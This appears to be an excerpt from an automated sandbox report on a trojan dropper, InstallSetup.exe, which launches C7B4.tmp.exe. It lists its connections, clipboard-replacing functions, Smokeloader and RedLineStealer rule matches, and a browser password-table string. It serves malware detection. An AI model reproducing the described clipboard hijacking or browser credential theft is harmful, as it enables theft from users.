        Source: unknownHTTPS traffic detected: 172.67.179.207:443 -> 192.168.2.8:49704 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 172.67.220.223:443 -> 192.168.2.8:49706 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 172.67.220.223:443 -> 192.168.2.8:49707 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 172.67.220.223:443 -> 192.168.2.8:49708 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 172.67.220.223:443 -> 192.168.2.8:49711 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 172.67.220.223:443 -> 192.168.2.8:49714 version: TLS 1.2
        Source: C:\Users\user\Desktop\InstallSetup.exeCode function: 0_2_004016DF __ehhandler$___std_fs_get_file_id@8,__EH_prolog3_GS,Sleep,GlobalLock,OpenClipboard,GetClipboardData,GlobalLock,_strlen,_strlen,_strlen,EmptyClipboard,GlobalAlloc,GlobalLock,GlobalUnlock,SetClipboardData,GlobalFree,CloseClipboard,Sleep,0_2_004016DF
        Source: C:\Users\user\Desktop\InstallSetup.exeCode function: 0_2_004016DF __ehhandler$___std_fs_get_file_id@8,__EH_prolog3_GS,Sleep,GlobalLock,OpenClipboard,GetClipboardData,GlobalLock,_strlen,_strlen,_strlen,EmptyClipboard,GlobalAlloc,GlobalLock,GlobalUnlock,SetClipboardData,GlobalFree,CloseClipboard,Sleep,0_2_004016DF
        Source: C:\Users\user\Desktop\InstallSetup.exeCode function: 0_2_00941942 __EH_prolog3_GS,Sleep,OpenClipboard,GetClipboardData,_strlen,_strlen,_strlen,EmptyClipboard,GlobalAlloc,GlobalUnlock,SetClipboardData,GlobalFree,CloseClipboard,Sleep,0_2_00941942
        Source: C:\Users\user\Desktop\InstallSetup.exeCode function: 0_2_004016DF __ehhandler$___std_fs_get_file_id@8,__EH_prolog3_GS,Sleep,GlobalLock,OpenClipboard,GetClipboardData,GlobalLock,_strlen,_strlen,_strlen,EmptyClipboard,GlobalAlloc,GlobalLock,GlobalUnlock,SetClipboardData,GlobalFree,CloseClipboard,Sleep,0_2_004016DF

        System Summary

        barindex
        Source: 00000003.00000002.1818190463.0000000000970000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown
        Source: 00000003.00000002.1818342942.0000000000A50000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
        Source: 00000000.00000002.3922162162.0000000000C00000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
        Source: 00000000.00000002.3920122138.0000000000940000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown
        Source: C:\Users\user\Desktop\InstallSetup.exeCode function: 0_2_00942361 NtdllDefWindowProc_W,GetClientRect,GetDC,CreateSolidBrush,CreatePen,Rectangle,GetDeviceCaps,MulDiv,CreateFontW,SetBkMode,_wcslen,_wcslen,_wcslen,_wcslen,ReleaseDC,0_2_00942361
        Source: C:\Users\user\Desktop\InstallSetup.exeCode function: 0_2_00942605 NtdllDefWindowProc_W,PostQuitMessage,0_2_00942605
        Source: C:\Users\user\Desktop\InstallSetup.exeCode function: 0_2_004280220_2_00428022
        Source: C:\Users\user\Desktop\InstallSetup.exeCode function: 0_2_004071AB0_2_004071AB
        Source: C:\Users\user\Desktop\InstallSetup.exeCode function: 0_2_004373D90_2_004373D9
        Source: C:\Users\user\Desktop\InstallSetup.exeCode function: 0_2_0042D4EE0_2_0042D4EE
        Source: C:\Users\user\Desktop\InstallSetup.exeCode function: 0_2_004274840_2_00427484
        Source: C:\Users\user\Desktop\InstallSetup.exeCode function: 0_2_004285600_2_00428560
        Source: C:\Users\user\Desktop\InstallSetup.exeCode function: 0_2_0043D6780_2_0043D678
        Source: C:\Users\user\Desktop\InstallSetup.exeCode function: 0_2_004166AF0_2_004166AF
        Source: C:\Users\user\Desktop\InstallSetup.exeCode function: 0_2_004137250_2_00413725
        Source: C:\Users\user\Desktop\InstallSetup.exeCode function: 0_2_004277F60_2_004277F6
        Source: C:\Users\user\Desktop\InstallSetup.exeCode function: 0_2_0040E9740_2_0040E974
        Source: C:\Users\user\Desktop\InstallSetup.exeCode function: 0_2_0042EAE00_2_0042EAE0
        Source: C:\Users\user\Desktop\InstallSetup.exeCode function: 0_2_00427AA00_2_00427AA0
        Source: C:\Users\user\Desktop\InstallSetup.exeCode function: 0_2_00418AAF0_2_00418AAF
        Source: C:\Users\user\Desktop\InstallSetup.exeCode function: 0_2_00436CBF0_2_00436CBF
        Source: C:\Users\user\Desktop\InstallSetup.exeCode function: 0_2_00427D670_2_00427D67
        Source: C:\Users\user\Desktop\InstallSetup.exeCode function: 0_2_00413F0B0_2_00413F0B
        Source: C:\Users\user\Desktop\InstallSetup.exeCode function: 0_2_0096ED470_2_0096ED47
        Source: C:\Users\user\Desktop\InstallSetup.exeCode function: 0_2_009541720_2_00954172
        Source: C:\Users\user\Desktop\InstallSetup.exeCode function: 0_2_009682890_2_00968289
        Source: C:\Users\user\Desktop\InstallSetup.exeCode function: 0_2_009676EB0_2_009676EB
        Source: C:\Users\user\Desktop\InstallSetup.exeCode function: 0_2_009687C70_2_009687C7
        Source: C:\Users\user\Desktop\InstallSetup.exeCode function: 0_2_0096D7550_2_0096D755
        Source: C:\Users\user\Desktop\InstallSetup.exeCode function: 0_2_0095398C0_2_0095398C
        Source: C:\Users\user\Desktop\InstallSetup.exeCode function: 0_2_009569160_2_00956916
        Source: C:\Users\user\Desktop\InstallSetup.exeCode function: 0_2_00967A5D0_2_00967A5D
        Source: C:\Users\user\Desktop\InstallSetup.exeCode function: 0_2_0094EBDB0_2_0094EBDB
        Source: C:\Users\user\Desktop\InstallSetup.exeCode function: 0_2_00958D160_2_00958D16
        Source: C:\Users\user\Desktop\InstallSetup.exeCode function: 0_2_00967D070_2_00967D07
        Source: C:\Users\user\Desktop\InstallSetup.exeCode function: 0_2_0096ED470_2_0096ED47
        Source: C:\Users\user\Desktop\InstallSetup.exeCode function: 0_2_00967FCE0_2_00967FCE
        Source: C:\Users\user\Desktop\InstallSetup.exeCode function: 0_2_00976F260_2_00976F26
        Source: C:\Users\user\AppData\Local\Temp\C7B4.tmp.exeCode function: 3_2_004088503_2_00408850
        Source: C:\Users\user\AppData\Local\Temp\C7B4.tmp.exeCode function: 3_2_004218A03_2_004218A0
        Source: C:\Users\user\AppData\Local\Temp\C7B4.tmp.exeCode function: 3_2_004221903_2_00422190
        Source: C:\Users\user\AppData\Local\Temp\C7B4.tmp.exeCode function: 3_2_00437DF03_2_00437DF0
        Source: C:\Users\user\AppData\Local\Temp\C7B4.tmp.exeCode function: 3_2_004095803_2_00409580
        Source: C:\Users\user\AppData\Local\Temp\C7B4.tmp.exeCode function: 3_2_004157993_2_00415799
        Source: C:\Users\user\AppData\Local\Temp\C7B4.tmp.exeCode function: 3_2_004238603_2_00423860
        Source: C:\Users\user\AppData\Local\Temp\C7B4.tmp.exeCode function: 3_2_004388103_2_00438810
        Source: C:\Users\user\AppData\Local\Temp\C7B4.tmp.exeCode function: 3_2_0041682D3_2_0041682D
        Source: C:\Users\user\AppData\Local\Temp\C7B4.tmp.exeCode function: 3_2_004288CB3_2_004288CB
        Source: C:\Users\user\AppData\Local\Temp\C7B4.tmp.exeCode function: 3_2_0043D8803_2_0043D880
        Source: C:\Users\user\AppData\Local\Temp\C7B4.tmp.exeCode function: 3_2_004309403_2_00430940
        Source: C:\Users\user\AppData\Local\Temp\C7B4.tmp.exeCode function: 3_2_004039703_2_00403970
        Source: C:\Users\user\AppData\Local\Temp\C7B4.tmp.exeCode function: 3_2_004209393_2_00420939
        Source: C:\Users\user\AppData\Local\Temp\C7B4.tmp.exeCode function: 3_2_004179C13_2_004179C1
        Source: C:\Users\user\AppData\Local\Temp\C7B4.tmp.exeCode function: 3_2_004231C23_2_004231C2
        Source: C:\Users\user\AppData\Local\Temp\C7B4.tmp.exeCode function: 3_2_004241C03_2_004241C0
        Source: C:\Users\user\AppData\Local\Temp\C7B4.tmp.exeCode function: 3_2_0043B1D03_2_0043B1D0
        Source: C:\Users\user\AppData\Local\Temp\C7B4.tmp.exeCode function: 3_2_004291DD3_2_004291DD
        Source: C:\Users\user\AppData\Local\Temp\C7B4.tmp.exeCode function: 3_2_0043D9803_2_0043D980
        Source: C:\Users\user\AppData\Local\Temp\C7B4.tmp.exeCode function: 3_2_004059903_2_00405990
        Source: C:\Users\user\AppData\Local\Temp\C7B4.tmp.exeCode function: 3_2_0043D9973_2_0043D997
        Source: C:\Users\user\AppData\Local\Temp\C7B4.tmp.exeCode function: 3_2_0043D9993_2_0043D999
        Source: C:\Users\user\AppData\Local\Temp\C7B4.tmp.exeCode function: 3_2_004091B03_2_004091B0
        Source: C:\Users\user\AppData\Local\Temp\C7B4.tmp.exeCode function: 3_2_0042CA493_2_0042CA49
        Source: C:\Users\user\AppData\Local\Temp\C7B4.tmp.exeCode function: 3_2_0042DA533_2_0042DA53
        Source: C:\Users\user\AppData\Local\Temp\C7B4.tmp.exeCode function: 3_2_004162633_2_00416263
        Source: C:\Users\user\AppData\Local\Temp\C7B4.tmp.exeCode function: 3_2_0040EA103_2_0040EA10
        Source: C:\Users\user\AppData\Local\Temp\C7B4.tmp.exeCode function: 3_2_004152203_2_00415220
        Source: C:\Users\user\AppData\Local\Temp\C7B4.tmp.exeCode function: 3_2_0042CAD03_2_0042CAD0
        Source: C:\Users\user\AppData\Local\Temp\C7B4.tmp.exeCode function: 3_2_004252DD3_2_004252DD
        Source: C:\Users\user\AppData\Local\Temp\C7B4.tmp.exeCode function: 3_2_0041B2E03_2_0041B2E0
        Source: C:\Users\user\AppData\Local\Temp\C7B4.tmp.exeCode function: 3_2_004062803_2_00406280
        Source: C:\Users\user\AppData\Local\Temp\C7B4.tmp.exeCode function: 3_2_0043DA803_2_0043DA80
        Source: C:\Users\user\AppData\Local\Temp\C7B4.tmp.exeCode function: 3_2_0041E2903_2_0041E290
        Source: C:\Users\user\AppData\Local\Temp\C7B4.tmp.exeCode function: 3_2_0041CB403_2_0041CB40
        Source: C:\Users\user\AppData\Local\Temp\C7B4.tmp.exeCode function: 3_2_0043D34D3_2_0043D34D
        Source: C:\Users\user\AppData\Local\Temp\C7B4.tmp.exeCode function: 3_2_00426B503_2_00426B50
        Source: C:\Users\user\AppData\Local\Temp\C7B4.tmp.exeCode function: 3_2_0043DB603_2_0043DB60
        Source: C:\Users\user\AppData\Local\Temp\C7B4.tmp.exeCode function: 3_2_00436B083_2_00436B08
        Source: C:\Users\user\AppData\Local\Temp\C7B4.tmp.exeCode function: 3_2_0042830D3_2_0042830D
        Source: C:\Users\user\AppData\Local\Temp\C7B4.tmp.exeCode function: 3_2_0042CB113_2_0042CB11
        Source: C:\Users\user\AppData\Local\Temp\C7B4.tmp.exeCode function: 3_2_004043203_2_00404320
        Source: C:\Users\user\AppData\Local\Temp\C7B4.tmp.exeCode function: 3_2_0042CB223_2_0042CB22
        Source: C:\Users\user\AppData\Local\Temp\C7B4.tmp.exeCode function: 3_2_004253273_2_00425327
        Source: C:\Users\user\AppData\Local\Temp\C7B4.tmp.exeCode function: 3_2_004083303_2_00408330
        Source: C:\Users\user\AppData\Local\Temp\C7B4.tmp.exeCode function: 3_2_0043F3303_2_0043F330
        Source: C:\Users\user\AppData\Local\Temp\C7B4.tmp.exeCode function: 3_2_0042A33F3_2_0042A33F
        Source: C:\Users\user\AppData\Local\Temp\C7B4.tmp.exeCode function: 3_2_0040DBD93_2_0040DBD9
        Source: C:\Users\user\AppData\Local\Temp\C7B4.tmp.exeCode function: 3_2_004243803_2_00424380
        Source: C:\Users\user\AppData\Local\Temp\C7B4.tmp.exeCode function: 3_2_0041FC753_2_0041FC75
        Source: C:\Users\user\AppData\Local\Temp\C7B4.tmp.exeCode function: 3_2_0041DC003_2_0041DC00
        Source: C:\Users\user\AppData\Local\Temp\C7B4.tmp.exeCode function: 3_2_00429C2B3_2_00429C2B
        Source: C:\Users\user\AppData\Local\Temp\C7B4.tmp.exeCode function: 3_2_004291DD3_2_004291DD
        Source: C:\Users\user\AppData\Local\Temp\C7B4.tmp.exeCode function: 3_2_0040ACF03_2_0040ACF0
        Source: C:\Users\user\AppData\Local\Temp\C7B4.tmp.exeCode function: 3_2_0041148F3_2_0041148F
        Source: C:\Users\user\AppData\Local\Temp\C7B4.tmp.exeCode function: 3_2_0042AC903_2_0042AC90
        Source: C:\Users\user\AppData\Local\Temp\C7B4.tmp.exeCode function: 3_2_0043ECA03_2_0043ECA0
        Source: C:\Users\user\AppData\Local\Temp\C7B4.tmp.exeCode function: 3_2_0040CD463_2_0040CD46
        Source: C:\Users\user\AppData\Local\Temp\C7B4.tmp.exeCode function: 3_2_004375003_2_00437500
        Source: C:\Users\user\AppData\Local\Temp\C7B4.tmp.exeCode function: 3_2_004225103_2_00422510
        Source: C:\Users\user\AppData\Local\Temp\C7B4.tmp.exeCode function: 3_2_00417DEE3_2_00417DEE
        Source: C:\Users\user\AppData\Local\Temp\C7B4.tmp.exeCode function: 3_2_0041759F3_2_0041759F
        Source: C:\Users\user\AppData\Local\Temp\C7B4.tmp.exeCode function: 3_2_00425E703_2_00425E70
        Source: C:\Users\user\AppData\Local\Temp\C7B4.tmp.exeCode function: 3_2_00436E743_2_00436E74
        Source: C:\Users\user\AppData\Local\Temp\C7B4.tmp.exeCode function: 3_2_004276033_2_00427603
        Source: C:\Users\user\AppData\Local\Temp\C7B4.tmp.exeCode function: 3_2_00425E303_2_00425E30
        Source: C:\Users\user\AppData\Local\Temp\C7B4.tmp.exeCode function: 3_2_004286C03_2_004286C0
        Source: C:\Users\user\AppData\Local\Temp\C7B4.tmp.exeCode function: 3_2_0043AEC03_2_0043AEC0
        Source: C:\Users\user\AppData\Local\Temp\C7B4.tmp.exeCode function: 3_2_004266D03_2_004266D0
        Source: C:\Users\user\AppData\Local\Temp\C7B4.tmp.exeCode function: 3_2_004236E23_2_004236E2
        Source: C:\Users\user\AppData\Local\Temp\C7B4.tmp.exeCode function: 3_2_00405EE03_2_00405EE0
        Source: C:\Users\user\AppData\Local\Temp\C7B4.tmp.exeCode function: 3_2_0041DE803_2_0041DE80
        Source: C:\Users\user\AppData\Local\Temp\C7B4.tmp.exeCode function: 3_2_00402F503_2_00402F50
        Source: C:\Users\user\AppData\Local\Temp\C7B4.tmp.exeCode function: 3_2_00420F503_2_00420F50
        Source: C:\Users\user\AppData\Local\Temp\C7B4.tmp.exeCode function: 3_2_00438F593_2_00438F59
        Source: C:\Users\user\AppData\Local\Temp\C7B4.tmp.exeCode function: 3_2_004067103_2_00406710
        Source: C:\Users\user\AppData\Local\Temp\C7B4.tmp.exeCode function: 3_2_00423F203_2_00423F20
        Source: C:\Users\user\AppData\Local\Temp\C7B4.tmp.exeCode function: 3_2_0043F7203_2_0043F720
        Source: C:\Users\user\AppData\Local\Temp\C7B4.tmp.exeCode function: 3_2_00419F303_2_00419F30
        Source: C:\Users\user\AppData\Local\Temp\C7B4.tmp.exeCode function: 3_2_0041E7C03_2_0041E7C0
        Source: C:\Users\user\AppData\Local\Temp\C7B4.tmp.exeCode function: 3_2_004197C23_2_004197C2
        Source: C:\Users\user\AppData\Local\Temp\C7B4.tmp.exeCode function: 3_2_0042DFE93_2_0042DFE9
        Source: C:\Users\user\AppData\Local\Temp\C7B4.tmp.exeCode function: 3_2_0040A7803_2_0040A780
        Source: C:\Users\user\AppData\Local\Temp\C7B4.tmp.exeCode function: 3_2_00411F903_2_00411F90
        Source: C:\Users\user\AppData\Local\Temp\C7B4.tmp.exeCode function: 3_2_004187923_2_00418792
        Source: C:\Users\user\AppData\Local\Temp\C7B4.tmp.exeCode function: 3_2_0043EFB03_2_0043EFB0
        Source: C:\Users\user\AppData\Local\Temp\C7B4.tmp.exeCode function: 3_2_009A70DB3_2_009A70DB
        Source: C:\Users\user\AppData\Local\Temp\C7B4.tmp.exeCode function: 3_2_009960D73_2_009960D7
        Source: C:\Users\user\AppData\Local\Temp\C7B4.tmp.exeCode function: 3_2_0098E0E73_2_0098E0E7
        Source: C:\Users\user\AppData\Local\Temp\C7B4.tmp.exeCode function: 3_2_009878063_2_00987806
        Source: C:\Users\user\AppData\Local\Temp\C7B4.tmp.exeCode function: 3_2_009A80573_2_009A8057
        Source: C:\Users\user\AppData\Local\Temp\C7B4.tmp.exeCode function: 3_2_009880553_2_00988055
        Source: C:\Users\user\AppData\Local\Temp\C7B4.tmp.exeCode function: 3_2_0098A1973_2_0098A197
        Source: C:\Users\user\AppData\Local\Temp\C7B4.tmp.exeCode function: 3_2_009AF9873_2_009AF987
        Source: C:\Users\user\AppData\Local\Temp\C7B4.tmp.exeCode function: 3_2_009911B73_2_009911B7
        Source: C:\Users\user\AppData\Local\Temp\C7B4.tmp.exeCode function: 3_2_009821F73_2_009821F7
        Source: C:\Users\user\AppData\Local\Temp\C7B4.tmp.exeCode function: 3_2_0097A9E73_2_0097A9E7
        Source: C:\Users\user\AppData\Local\Temp\C7B4.tmp.exeCode function: 3_2_009969373_2_00996937
        Source: C:\Users\user\AppData\Local\Temp\C7B4.tmp.exeCode function: 3_2_009AB1273_2_009AB127
        Source: C:\Users\user\AppData\Local\Temp\C7B4.tmp.exeCode function: 3_2_009989273_2_00998927
        Source: C:\Users\user\AppData\Local\Temp\C7B4.tmp.exeCode function: 3_2_009761473_2_00976147
        Source: C:\Users\user\AppData\Local\Temp\C7B4.tmp.exeCode function: 3_2_009769773_2_00976977
        Source: C:\Users\user\AppData\Local\Temp\C7B4.tmp.exeCode function: 3_2_009931663_2_00993166
        Source: C:\Users\user\AppData\Local\Temp\C7B4.tmp.exeCode function: 3_2_00978AB73_2_00978AB7
        Source: C:\Users\user\AppData\Local\Temp\C7B4.tmp.exeCode function: 3_2_009AF2173_2_009AF217
        Source: C:\Users\user\AppData\Local\Temp\C7B4.tmp.exeCode function: 3_2_0098D2303_2_0098D230
        Source: C:\Users\user\AppData\Local\Temp\C7B4.tmp.exeCode function: 3_2_00989A293_2_00989A29
        Source: C:\Users\user\AppData\Local\Temp\C7B4.tmp.exeCode function: 3_2_0098EA273_2_0098EA27
        Source: C:\Users\user\AppData\Local\Temp\C7B4.tmp.exeCode function: 3_2_0099E2503_2_0099E250
        Source: C:\Users\user\AppData\Local\Temp\C7B4.tmp.exeCode function: 3_2_009A8A773_2_009A8A77
        Source: C:\Users\user\AppData\Local\Temp\C7B4.tmp.exeCode function: 3_2_00990BA03_2_00990BA0
        Source: C:\Users\user\AppData\Local\Temp\C7B4.tmp.exeCode function: 3_2_009A0BA73_2_009A0BA7
        Source: C:\Users\user\AppData\Local\Temp\C7B4.tmp.exeCode function: 3_2_00973BD73_2_00973BD7
        Source: C:\Users\user\AppData\Local\Temp\C7B4.tmp.exeCode function: 3_2_00975BF73_2_00975BF7
        Source: C:\Users\user\AppData\Local\Temp\C7B4.tmp.exeCode function: 3_2_009923F73_2_009923F7
        Source: C:\Users\user\AppData\Local\Temp\C7B4.tmp.exeCode function: 3_2_00991B073_2_00991B07
        Source: C:\Users\user\AppData\Local\Temp\C7B4.tmp.exeCode function: 3_2_0099DCBC3_2_0099DCBC
        Source: C:\Users\user\AppData\Local\Temp\C7B4.tmp.exeCode function: 3_2_0099CCB03_2_0099CCB0
        Source: C:\Users\user\AppData\Local\Temp\C7B4.tmp.exeCode function: 3_2_0098E4F73_2_0098E4F7
        Source: C:\Users\user\AppData\Local\Temp\C7B4.tmp.exeCode function: 3_2_009764E73_2_009764E7
        Source: C:\Users\user\AppData\Local\Temp\C7B4.tmp.exeCode function: 3_2_009794173_2_00979417
        Source: C:\Users\user\AppData\Local\Temp\C7B4.tmp.exeCode function: 3_2_009994443_2_00999444
        Source: C:\Users\user\AppData\Local\Temp\C7B4.tmp.exeCode function: 3_2_0097EC773_2_0097EC77
        Source: C:\Users\user\AppData\Local\Temp\C7B4.tmp.exeCode function: 3_2_009785973_2_00978597
        Source: C:\Users\user\AppData\Local\Temp\C7B4.tmp.exeCode function: 3_2_009AF5973_2_009AF597
        Source: C:\Users\user\AppData\Local\Temp\C7B4.tmp.exeCode function: 3_2_009745873_2_00974587
        Source: C:\Users\user\AppData\Local\Temp\C7B4.tmp.exeCode function: 3_2_0099CD893_2_0099CD89
        Source: C:\Users\user\AppData\Local\Temp\C7B4.tmp.exeCode function: 3_2_0099351D3_2_0099351D
        Source: C:\Users\user\AppData\Local\Temp\C7B4.tmp.exeCode function: 3_2_0099CD373_2_0099CD37
        Source: C:\Users\user\AppData\Local\Temp\C7B4.tmp.exeCode function: 3_2_0098B5473_2_0098B547
        Source: C:\Users\user\AppData\Local\Temp\C7B4.tmp.exeCode function: 3_2_0099CD783_2_0099CD78
        Source: C:\Users\user\AppData\Local\Temp\C7B4.tmp.exeCode function: 3_2_009A6D6F3_2_009A6D6F
        Source: C:\Users\user\AppData\Local\Temp\C7B4.tmp.exeCode function: 3_2_009956943_2_00995694
        Source: C:\Users\user\AppData\Local\Temp\C7B4.tmp.exeCode function: 3_2_009946873_2_00994687
        Source: C:\Users\user\AppData\Local\Temp\C7B4.tmp.exeCode function: 3_2_0098FEDC3_2_0098FEDC
        Source: C:\Users\user\AppData\Local\Temp\C7B4.tmp.exeCode function: 3_2_009816F63_2_009816F6
        Source: C:\Users\user\AppData\Local\Temp\C7B4.tmp.exeCode function: 3_2_0099AEF73_2_0099AEF7
        Source: C:\Users\user\AppData\Local\Temp\C7B4.tmp.exeCode function: 3_2_0097DE403_2_0097DE40
        Source: C:\Users\user\AppData\Local\Temp\C7B4.tmp.exeCode function: 3_2_0098CE633_2_0098CE63
        Source: C:\Users\user\AppData\Local\Temp\C7B4.tmp.exeCode function: 3_2_0098DE673_2_0098DE67
        Source: C:\Users\user\AppData\Local\Temp\C7B4.tmp.exeCode function: 3_2_0097CFAD3_2_0097CFAD
        Source: C:\Users\user\AppData\Local\Temp\C7B4.tmp.exeCode function: 3_2_009797E73_2_009797E7
        Source: C:\Users\user\AppData\Local\Temp\C7B4.tmp.exeCode function: 3_2_009AEF073_2_009AEF07
        Source: C:\Users\user\AppData\Local\Temp\C7B4.tmp.exeCode function: 3_2_00986F353_2_00986F35
        Source: C:\Users\user\AppData\Local\Temp\C7B4.tmp.exeCode function: 3_2_009927773_2_00992777
        Source: C:\Users\user\AppData\Local\Temp\C7B4.tmp.exeCode function: 3_2_009A77673_2_009A7767
        Source: C:\Users\user\Desktop\InstallSetup.exeCode function: String function: 00950987 appears 53 times
        Source: C:\Users\user\Desktop\InstallSetup.exeCode function: String function: 00410720 appears 53 times
        Source: C:\Users\user\Desktop\InstallSetup.exeCode function: String function: 0040F903 appears 36 times
        Source: C:\Users\user\Desktop\InstallSetup.exeCode function: String function: 00950019 appears 121 times
        Source: C:\Users\user\Desktop\InstallSetup.exeCode function: String function: 0040FDB2 appears 125 times
        Source: C:\Users\user\AppData\Local\Temp\C7B4.tmp.exeCode function: String function: 00408030 appears 42 times
        Source: C:\Users\user\AppData\Local\Temp\C7B4.tmp.exeCode function: String function: 00414400 appears 65 times
        Source: C:\Users\user\AppData\Local\Temp\C7B4.tmp.exeCode function: String function: 00984667 appears 65 times
        Source: C:\Users\user\AppData\Local\Temp\C7B4.tmp.exeCode function: String function: 00978297 appears 71 times
        Source: C:\Users\user\AppData\Local\Temp\C7B4.tmp.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 3032 -s 1952
        Source: InstallSetup.exeBinary or memory string: OriginalFileName vs InstallSetup.exe
        Source: InstallSetup.exe, 00000000.00000003.1479376048.0000000000A10000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFileNameScreenshoter.exeF vs InstallSetup.exe
        Source: InstallSetup.exe, 00000000.00000002.3919786935.0000000000400000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFileNameScreenshoter.exeF vs InstallSetup.exe
        Source: InstallSetup.exe, 00000000.00000002.3920122138.0000000000940000.00000040.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFileNameScreenshoter.exeF vs InstallSetup.exe
        Source: InstallSetup.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
        Source: 00000003.00000002.1818190463.0000000000970000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23
        Source: 00000003.00000002.1818342942.0000000000A50000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
        Source: 00000000.00000002.3922162162.0000000000C00000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
        Source: 00000000.00000002.3920122138.0000000000940000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23
        Source: InstallSetup.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
        Source: ScreenUpdateSync[1].exe.0.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
        Source: C7B4.tmp.exe.0.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
        Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@4/7@2/3
        Source: C:\Users\user\Desktop\InstallSetup.exeCode function: 0_2_00C016B6 CreateToolhelp32Snapshot,Module32First,0_2_00C016B6
        Source: C:\Users\user\AppData\Local\Temp\C7B4.tmp.exeCode function: 3_2_00437DF0 CoCreateInstance,SysAllocString,CoSetProxyBlanket,SysAllocString,SysAllocString,VariantInit,VariantClear,SysFreeString,SysFreeString,SysFreeString,SysFreeString,GetVolumeInformationW,3_2_00437DF0
        Source: C:\Users\user\Desktop\InstallSetup.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\D81IGXZV\track_prt[1].htmJump to behavior
        Source: C:\Users\user\Desktop\InstallSetup.exeMutant created: \Sessions\1\BaseNamedObjects\5rjtejk5rytrr
        Source: C:\Windows\SysWOW64\WerFault.exeMutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess3032
        Source: C:\Users\user\Desktop\InstallSetup.exeFile created: C:\Users\user\AppData\Local\Temp\C7B4.tmpJump to behavior
        Source: InstallSetup.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
        Source: C:\Users\user\Desktop\InstallSetup.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
        Source: C:\Users\user\Desktop\InstallSetup.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
        Source: C7B4.tmp.exe, 00000003.00000003.1617953055.000000000310A000.00000004.00000800.00020000.00000000.sdmp, C7B4.tmp.exe, 00000003.00000003.1617391371.0000000003126000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
        Source: InstallSetup.exeReversingLabs: Detection: 68%
        Source: unknownProcess created: C:\Users\user\Desktop\InstallSetup.exe "C:\Users\user\Desktop\InstallSetup.exe"
        Source: C:\Users\user\Desktop\InstallSetup.exeProcess created: C:\Users\user\AppData\Local\Temp\C7B4.tmp.exe "C:\Users\user\AppData\Local\Temp\C7B4.tmp.exe"
        Source: C:\Users\user\AppData\Local\Temp\C7B4.tmp.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 3032 -s 1952
